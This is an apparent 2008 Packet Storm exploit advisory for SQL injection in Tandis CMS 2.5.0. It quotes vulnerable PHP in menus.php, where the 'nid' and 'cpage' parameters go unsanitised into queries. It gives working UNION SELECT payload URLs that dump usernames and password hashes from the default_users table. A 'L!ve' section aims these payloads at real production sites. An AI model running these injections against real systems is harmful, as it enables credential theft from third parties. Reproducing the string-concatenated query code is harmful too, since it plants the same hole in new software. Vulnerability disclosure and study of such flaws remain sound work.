tandiscms-sql.txt

2008-10-28T00:00:00
ID PACKETSTORM:71280
Type packetstorm
Reporter G4N0K
Modified 2008-10-28T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Tandis CMS <= 2.5.0 Multiple Remote SQL Injection Vulnerabilities  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
[~] Script: Tandis CMS v2.5.0  
[~] Language : PHP  
[~] WebSite: http://tandiscms.com/  
[~] affected File: menus.php  
[~] Type : Commercial  
[~] Report-Date : 27/10/2008  
  
--[ CoDE ]--  
[~] index.php  
{..}  
48 include("./includes/menus.php");  
{..}  
[~] /includes/menus.php  
{...}  
27 if (isset($_GET['cpage'])) {  
28 $pagecode = $_GET['cpage'];  
xx {...}  
40 $result = mysql_query("SELECT * FROM ".$tandisversion."menus where(menuparentcode=".$pagecode." AND tid=".$_SESSION['curr_tandis_id'].")");  
--------------------------  
{...}  
295 if (!isset($_GET['nid'])) {  
296 print "[ERROR] You Change Standard Parameters<br>This System Protected By NNET SECURITY !";   
297 exit();  
298 }  
299 $page_content = array();  
300 $result = mysql_query("SELECT ".$tandisversion."tblnews.*,".$tandisversion."contents.content as cnt FROM ".$tandisversion."tblnews,".$tandisversion."contents where (nid=".$_GET['nid']." AND ".$tandisversion."tblnews.nmessage=".$tandisversion."contents.id)");  
{...}  
  
--[ /CoDE ]--  
  
--[ DoRK ]--  
WTF...!?  
sry kidz...!  
no more d0rk.  
  
--[ Founder ]--  
G4N0K <mail.ganok[at]gmail.com>  
  
  
--[ Exploit ]--  
[~] http://localhost/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--  
[~] http://localhost/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--  
  
  
--[ L!ve ]--  
http://tandiscms.com/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--  
http://tandiscms.com/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--  
http://www.geomatic.ir/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--  
http://www.geomatic.ir/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--  
  
  
--[ Greetz ]--  
[~] ALLAH  
[~] Tornado2800 <Tornado2800[at]gmail.com>  
[~] Hussain-X <darkangel_g85[at]yahoo.com>  
  
  
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)  
//ALLAH, forgimme...  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
exit(); //EoX  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=`